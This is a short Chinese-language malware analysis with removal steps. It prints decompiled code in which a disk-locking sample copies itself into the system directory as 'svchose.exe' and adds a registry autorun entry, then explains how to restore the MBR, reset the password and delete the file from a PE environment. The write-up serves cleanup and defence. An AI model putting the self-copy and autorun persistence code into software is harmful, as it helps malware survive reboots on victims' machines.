v4 = GetModuleHandleA(0);
GetModuleFileNameA(v4, Filename, 0x104u);
GetSystemDirectoryA(Buffer, 0x104u);
strcat(Buffer, aSvchoseExe);
CopyFileA(Filename, Buffer, 0);
RegOpenKeyExA(HKEY_LOCAL_MACHINE, SubKey, 0, 2u, &phkResult);
RegSetValueExA(phkResult, ValueName, 0, 1u, (const BYTE *)Buffer, 0x104u);
RegCloseKey(phkResult);
他会拷贝到系统目录下,然后设置开机启动项。所以如果你直接登录的话,又会被执行锁硬盘。所以正确的方式是进PE下。
1,用我工具恢复MBR。
2,清账户密码,或用他的123.
3,重启进PE,用急救箱扫全盘,或者找到系统盘下的svchose.exe,32位在windows\system32下,64位在windows\syswow64,删除后进系统才行。
|